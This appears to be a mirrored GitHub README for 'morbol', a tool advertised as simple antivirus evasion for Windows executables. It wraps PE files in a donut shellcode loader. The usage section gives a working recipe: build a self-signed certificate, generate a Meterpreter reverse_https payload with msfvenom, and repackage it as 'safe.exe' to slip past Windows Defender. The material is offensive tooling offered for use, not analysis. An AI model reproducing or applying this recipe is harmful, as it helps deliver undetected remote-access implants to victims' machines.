slemire / morbol

Simple AV Evasion for PE Files

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Morbol

Wraps PE Files (PIE required) into a shellcode loader via donut. This mainly evades detection on disk.

Setup

pip3 install donut-shellcode
sudo apt-get install upx

Usage

In my experience the only reliable way to evade defender with meterpreter is to use a reverse_https payload with a custom cert.

  • Modify /etc/ssl/openssl.cnf so that CipherString = DEFAULT
  • openssl req -new -x509 -nodes -out cert.crt -keyout priv.key
  • set HandlerSSLCert on the server side listener
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=... LPORT=...  HandlerSSLCert=... -f exe  > msf.exe
python3 morbol.py msf.exe safe.exe

Credit

Heavily based on:

About

Simple AV Evasion for PE Files

License:MIT License


Languages

Language:Go 72.3%Language:Python 27.7%